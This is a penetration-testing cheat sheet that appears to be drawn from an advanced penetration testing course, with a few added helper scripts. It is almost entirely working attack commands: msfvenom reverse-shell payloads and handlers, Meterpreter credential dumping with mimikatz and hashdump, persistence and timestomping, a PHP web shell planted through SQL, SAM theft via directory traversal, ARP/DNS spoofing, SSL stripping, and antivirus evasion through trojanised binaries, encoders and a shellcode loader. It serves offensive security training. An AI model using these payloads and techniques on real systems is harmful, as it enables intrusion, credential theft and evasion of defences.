Metasploit Cheat Sheet

List payloads (LHOST= and LPORT= are left blank throughout this sheet: fill in the listener IP and port you will run the handler on)

msfvenom -l payloads

I. Binaries


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho


II. Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
(the raw PHP output has no opening tag, so the second line prepends '<?php '; pbcopy/pbpaste are macOS clipboard tools, on Linux prepend the tag with any editor)

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads


Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl


For all shellcode see 'msfvenom --help-formats' ('msfvenom --list formats' on newer builds) for the valid output formats. With a source-code format (c, python, ruby, csharp, ...) msfvenom emits the payload as an array literal that can be pasted straight into an exploit written in that language.

IV. Shellcode


Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f <format>


Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f <format>


Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f <format>


Metasploit handlers can be great at quickly setting up Metasploit to receive your incoming shells. Handlers should be in the following format (PAYLOAD, LHOST and LPORT must match what the msfvenom payload was built with; -j runs the handler as a background job, -z does not interact with the first session, and ExitOnSession false keeps the handler listening after the first callback).


V. Handlers

use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
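Added example, not from the original cheat sheet or from Metasploit: a POSIX sh script that derives both the msfvenom command and the handler resource file from one set of PAYLOAD/LHOST/LPORT values, so the two cannot drift apart, and flags the staged-versus-stageless naming (meterpreter/reverse_tcp vs meterpreter_reverse_tcp) that most often leaves a handler sitting silent. The default payload, address, port and file names are assumed values.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: keep the msfvenom payload
# and the multi/handler in step by generating both from one set of variables.
# Defaults below are assumptions for illustration.
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
LHOST="${LHOST:-192.168.20.9}"
LPORT="${LPORT:-4444}"

# handler_rc <payload> <lhost> <lport>: print a resource script for
# `msfconsole -r`, in the handler format the notes above use.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# venom_cmd <payload> <lhost> <lport> <format> <outfile>: print the matching
# msfvenom invocation (same payload name, address and port as the handler).
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# is_staged <payload>: 0 if the payload name is staged (stage/stager, e.g.
# meterpreter/reverse_tcp), 1 if stageless (meterpreter_reverse_tcp).
# A staged binary only completes against a handler set to the same staged
# name; a stageless handler pointed at it yields a session that never opens.
is_staged() {
  case "$1" in
    */meterpreter/*|*/shell/*|*/vncinject/*|*/dllinject/*) return 0 ;;
    *) return 1 ;;
  esac
}

# generate <rcfile> <binary>: write the handler script and show the msfvenom
# command that produces the matching payload.
generate() {
  handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > "$1"
  venom_cmd "$PAYLOAD" "$LHOST" "$LPORT" exe "$2"
  if is_staged "$PAYLOAD"; then
    echo "# staged payload: the handler in $1 must use exactly $PAYLOAD"
  else
    echo "# stageless payload: no stage is sent, the whole payload is in $2"
  fi
  echo "# then: msfconsole -q -r $1"
}

# Run only when executed as a script named gen_handler.sh (not when sourced).
case "$0" in
  *gen_handler.sh) generate handler.rc shell.exe ;;
esac
```

Run it as `PAYLOAD=linux/x86/meterpreter/reverse_tcp LPORT=443 sh gen_handler.sh`, then paste the printed msfvenom line and start the handler with the printed msfconsole line.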


Meterpreter Useful Commands:

upload file c:\\windows                    //upload a file to the Windows target (backslashes are doubled)

download c:\\windows\\repair\\sam /tmp     //download the SAM backup to the attacker's /tmp

execute -f c:\\windows\\temp\\exploit.exe  //run an executable already on the target

execute -f cmd -c                          //run cmd.exe with channelized I/O so you can interact with it

ps                                         //list processes (pick a stable one to migrate into)

shell                                      //drop to an interactive system shell

getsystem                                  //try the built-in privilege escalation techniques to get SYSTEM

hashdump                                   //dump the local account password hashes (needs SYSTEM)

portfwd add -l 3389 -p 3389 -r target      //forward local port 3389 to RDP on the target through the session

portfwd delete -l 3389 -p 3389 -r target   //remove that forward


Additional useful commands are as follows:

  • msfconsole -r unicorn.rb        //start msfconsole and replay a resource script

  • meterpreter shell

  • getsid

  • getuid

  • migrate

  • getsystem

  • run killav

  • run checkvm

  • exploit Windows7 Service Pack 1 msp

  • use incognito

  • run countermeasure

  • run countermeasure -d -k

  • shell


    • netsh firewall set opmode disable    //disable the (legacy) Windows firewall from the shell


  • run vnc

  • load mimikatz

  • ls

  • upload /home/user/mimikatz.exe C:\\

  • timestomp mimikatz.exe -f "C:\\Windows\\System32\\cmd.exe"    //copy cmd.exe's timestamps onto the dropped binary

  • shell


    • mimikatz.exe

    • privilege::debug

    • inject::process lsass.exe sekurlsa.dll    (mimikatz 1.x syntax)

    • getLogonPasswords                         (mimikatz 1.x syntax)

    • sekurlsa::logonPasswords full             (mimikatz 2.x equivalent)


  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196    //-A start a matching handler, -L drop location, -X run at boot via the registry, -i reconnect interval in seconds, -p/-r handler port and IP

  • attrib +h c:\autoexec.bat    //make it hidden

  • Priv Esc Exploit CVE-2014-4113 (exploit/windows/local/ms14_058_track_popup_menu)


Burp Suite and sqlmap

1. Burp Suite -> Intruder
 http://www.site.com/section.php?id=51

2. sqlmap
python sqlmap.py -u "http://www.site.com/section.php?id=51"

# Discover databases
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs

# Find tables in a particular database
python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D database_name

# Get columns of the table
python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D database_name -T users

# Get data from the columns
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D database_name -T users

# Get an OS shell (needs stacked queries or file-write privileges on the DBMS)
python sqlmap.py -u "http://www.site.com/section.php?id=51" --os-shell

# Upload a PHP shell
-> b374kshell.php

Netcat Shell and Persistence

# Notes on Cybrary "Advanced Penetration Test"
Opening a command shell listener (needs a netcat build that supports -e, e.g. nc.traditional):
root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files
Redirect output to a file on the receiving side:
root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:
root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating tasks with cron jobs
Add your task to one of the scheduled directories (/etc/cron.hourly, /etc/cron.daily, ...)
*For more flexibility add a line to /etc/crontab

Information Gathering

# Source: Cybrary “Advanced Penetration Test”

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois ________.com

(4) DNS Recon
root@kali:~# host www.________.com
root@kali:~# host -t ns ________.com
root@kali:~# host -t mx ________.com

*DNS Zone Transfer (ask an authoritative name server for the whole zone; only misconfigured servers answer)
root@kali:~# host -t ns zoneedit.com
root@kali:~# host -l zoneedit.com ns2.zoneedit.com

DNS Bruteforce
root@kali:~# fierce -dns ________.com
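Added example, not from the course notes: the zone-transfer check above, run against every authoritative server instead of one picked by hand, since a single permissive secondary is enough. ns_from_host_output parses the lines that `host -t ns` prints; the sample lines are constructed to match that format rather than taken from a real lookup, and axfr_all needs network access.

```shell
#!/bin/sh
# Added example, not from the course notes: try AXFR against every NS of a
# domain. SAMPLE_NS_OUTPUT is constructed to look like `host -t ns` output.
SAMPLE_NS_OUTPUT='zoneedit.com name server ns2.zoneedit.com.
zoneedit.com name server ns4.zoneedit.com.'

# ns_from_host_output: read `host -t ns <domain>` output on stdin and print
# one name server per line, trailing dot removed.
ns_from_host_output() {
  awk '/ name server / { sub(/\.$/, "", $NF); print $NF }'
}

# axfr_all <domain>: run `host -l` (a zone transfer) against each name
# server, keep the zone file for any server that answered, and report the
# rest as refused. Needs DNS access, so the test does not call it.
axfr_all() {
  domain="$1"
  host -t ns "$domain" | ns_from_host_output | while read -r ns; do
    out="axfr-$domain-$ns.txt"
    if host -l "$domain" "$ns" > "$out" 2>/dev/null \
       && grep -q ' has address ' "$out"; then
      echo "AXFR allowed by $ns (zone saved to $out)"
    else
      rm -f "$out"
      echo "AXFR refused by $ns"
    fi
  done
}

# Usage: axfr_all zoneedit.com
```

`host -l` prints "; Transfer failed." and exits non-zero when the server refuses, so the grep on " has address " is a second check that what came back is really zone data and not an error banner.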

(5) Netcraft
http://searchdns.netcraft.com/

(6) The Harvester
Automatically searches public sources for email addresses, hostnames and similar
root@kali:~# theharvester -d ________.com -l 500 -b all

(7) Maltego
Graphical information gathering and correlation tool
root@kali:~# maltego

(8) Recon-ng
Reconnaissance framework
recon-ng > use recon/hosts/enum/http/web/xssed
[recon-ng][default][xssed] > show options
[recon-ng][default][xssed] > set DOMAIN ________.com
DOMAIN => ________.com
[recon-ng][default][xssed] > run

(9) Port Scanning
Nmap
root@kali:~# nmap -sS 192.168.20.9-11 -oA synscan
root@kali:~# nmap -sU 192.168.20.9-11 -oA udpscan
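Added example, not part of the notes: -oA above also writes a grepable synscan.gnmap, and this POSIX sh/awk snippet pulls the open ports per host out of it, which is the list you actually carry into vulnerability identification. The .gnmap lines are constructed to match nmap's field layout, not a real scan result.

```shell
#!/bin/sh
# Added example, not from the original notes: extract open ports from the
# grepable output that `nmap ... -oA synscan` writes to synscan.gnmap.

# sample_gnmap: print constructed .gnmap lines (fields are tab-separated,
# so they are built with printf to keep the tabs intact).
sample_gnmap() {
  printf '# Nmap 7.80 scan initiated as: nmap -sS 192.168.20.9-11 -oA synscan\n'
  printf 'Host: 192.168.20.10 ()\tStatus: Up\n'
  printf 'Host: 192.168.20.10 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 3232/open/tcp//unknown///\tIgnored State: closed (997)\n'
  printf 'Host: 192.168.20.11 ()\tPorts: 22/open/tcp//ssh///, 2049/open/tcp//nfs///\tIgnored State: closed (998)\n'
  printf '# Nmap done -- 3 IP addresses (2 hosts up) scanned in 5.00 seconds\n'
}

# open_ports <file.gnmap>: print "ip port/proto service" for every open port.
# Each entry in the Ports field is port/state/proto/owner/service/rpc/version.
open_ports() {
  awk -F'\t' '
    /^Host:/ {
      ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
      for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) {
        ports = $i; sub(/^Ports: /, "", ports)
        n = split(ports, p, /, /)
        for (j = 1; j <= n; j++) {
          split(p[j], f, "/")
          if (f[2] == "open") printf "%s %s/%s %s\n", ip, f[1], f[3], f[5]
        }
      }
    }' "$1"
}

# hosts_with_port <file.gnmap> <tcp-port>: which hosts expose that port,
# e.g. every box with the Zervit web server on 3232.
hosts_with_port() {
  open_ports "$1" | awk -v want="$2/tcp" '$2 == want { print $1 }'
}

# Usage: open_ports synscan.gnmap; hosts_with_port synscan.gnmap 3232
```

Filtered ports are dropped on purpose (they show up as "filtered" in the state field), so the output is only what answered the SYN.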

Metasploit Port Scanners
search portscan (shows portscan modules)
use auxiliary/scanner/portscan/tcp (runs a TCP connect scan)
Use auxiliary modules like exploits (use, set, run/exploit, etc.)

Vulnerability Identification

Source: Georgia Weidman, “Advanced Penetration Test” Cybrary
Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting Engine
Vulnerability scripts, listed in /usr/share/nmap/scripts in Kali

nmap -sC 172.16.85.135-136
nmap --script-help=smb-check-vulns
nmap --script=nfs-ls 172.16.85.136
nmap --script=smb-os-discovery 172.16.85.136
(smb-check-vulns was split into the smb-vuln-* scripts in Nmap 7; use --script=smb-vuln* on current builds)

(3) Metasploit Scanners
auxiliary/scanner/ftp/anonymous

Web Application Scanning
(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) Nikto
Vulnerability database of known website issues
nikto -host http://172.16.85.136

Manual Analysis
*Default passwords – Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning (on the LAN this is DNS spoofing: while ARP spoofing, answer the victim's lookups before the real resolver does)
hosts.txt: 192.168.20.9 www.gmail.com
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)
Crypto between browser and webserver
Can't see credentials in plaintext

SSL Man in the Middle
SSL Stripping (rewrite the victim's HTTP->HTTPS links and redirects to plain HTTP; sites the browser already knows via HSTS are not affected)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) Open phpMyAdmin
a. Create a PHP shell in the Apache webroot using a SQL query (MySQL needs the FILE privilege and write access to the webroot)
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 192.168.20.10 3232
GET /../../../../../boot.ini HTTP/1.1

http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec

(6) Piggybacking on a Compromised Service
vsftpd 2.3.4 -> backdoored
A username ending in ":)" spawned a backdoor shell on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount -e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs -o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/
then: ssh username@172.16.85.136

Password Attacks

Source: Georgia Weidman on “Advanced Penetration Test”
(1) Crunch
Tool to bruteforce keyspace

$: crunch 7 7 AB
Bruteforces all 7 character passwords composed of only the characters A and B

(2) ceWL
Tool to map a website and pull potentially interesting words to add to a wordlist

$: cewl -w [words].txt -d 1 -m 5 http://www.[website].com
Depth 1
Minimum length of word is 5 characters

(3) Hydra
Online password cracking tool

$: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks​

(1) Opening the SAM File
We got access to a backup of the SAM and SYSTEM files with the directory traversal vulnerability.

You can also get these files with physical access (boot from live media and copy them off the disk) unless a BIOS/boot password or full-disk encryption is in place.

$: bkhive system xpkey.txt                 (extract the boot key from the SYSTEM hive)
$: samdump2 sam xpkey.txt > xphashes.txt   (decrypt the SAM hashes with it)

(2) John the Ripper
$: john xphashes.txt johnlinuxpasswords.txt --wordlist=passwordfile.txt

(3) oclHashcat
Can use GPUs to crack faster

Online Password Cracking
http://tools.question-defense.com
http://cloudcracker.com

Windows Credential Editor​
Tool to pull plaintext passwords etc out of the memory of the LSASS process
*Have to drop the binary onto the system

wce.exe -w

Advanced Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary

(1) Client Side Exploits

Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating ‘msf.pdf’ file…
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444

(4) PDF Embedded Executable
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /usr/share/set/readme/User_Manual.pdf
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.9
msf exploit(adobe_pdf_embedded_exe) > exploit

(5) Java Exploits
msf > use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean) > set SRVHOST 192.168.20.9
msf exploit(java_jre17_jmxbean) > set SRVPORT 80
msf exploit(java_jre17_jmxbean) > set URIPATH javaexploit
msf exploit(java_jre17_jmxbean) > show payloads
msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_http

(6) Java Applets
msf exploit(java_jre17_jmxbean) > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > set APPLETNAME [APPNAME]
msf exploit(java_signed_applet) > set SRVHOST 192.168.20.9
msf exploit(java_signed_applet) > set SRVPORT 80

(7) Browser Autopwn
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf auxiliary(browser_autopwn) > set URIPATH autopwn
URIPATH => autopwn
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] — Done, found 16 exploit modules
[*] Using URL: http://0.0.0.0:8080/autopwn
[*] Local IP: http://192.168.20.9:8080/autopwn
[*] Server started.

(8) Winamp Skin Example
msf > use exploit/windows/fileformat/winamp_maki_bof
msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(winamp_maki_bof) > set LHOST 192.168.20.9
msf exploit(winamp_maki_bof) > exploit

Social Engineering
setoolkit

Trojans: Bypassing Anti-Virus Signature Detection
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe

-x executable template to embed the payload in
-k keep the template's normal behaviour and run the payload in a new thread

Metasploit Encoding
We can also run our shellcode through an encoder to obfuscate it (an encoder changes the byte pattern, not the behaviour, and the decoder stub it prepends is itself well known to AV engines, so encoding alone rarely beats a modern scanner).

msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe

Multi-Encoding
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw > meterpreterencoded.bin
msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin
("-p -" reads the already-encoded raw payload from stdin, so -a and --platform have to be given explicitly)

Combining Techniques
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe

Custom Compiling
Put the shellcode in a C source file next to a block of random bytes and run it by casting the array to a function pointer:

#include <stdio.h>

/* random padding so the binary's byte pattern differs on every build */
unsigned char random[] = "";     /* paste the output of the urandom command below */

/* paste the array from msfvenom -f c here (it is emitted as unsigned char buf[]; rename it to shellcode) */
unsigned char shellcode[] = "";

int main(void) {
    /* cast the byte array to a function pointer and jump into it;
       the data section must be executable, so this faults on a
       build where DEP is enforced */
    ((void (*)())shellcode)();
    return 0;
}

Creating Shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5

Creating Randomness:
cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512

Compiling:
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c

Hyperion
Encrypts the executable with AES under a deliberately small key that is not stored in the file; the stub brute-forces the key at run time, so the original payload only appears decrypted in memory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe

cd Hyperion-1.0/
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe

Veil
Framework for using different techniques to bypass antivirus

cd Veil-Evasion-master
./Veil-Evasion.py
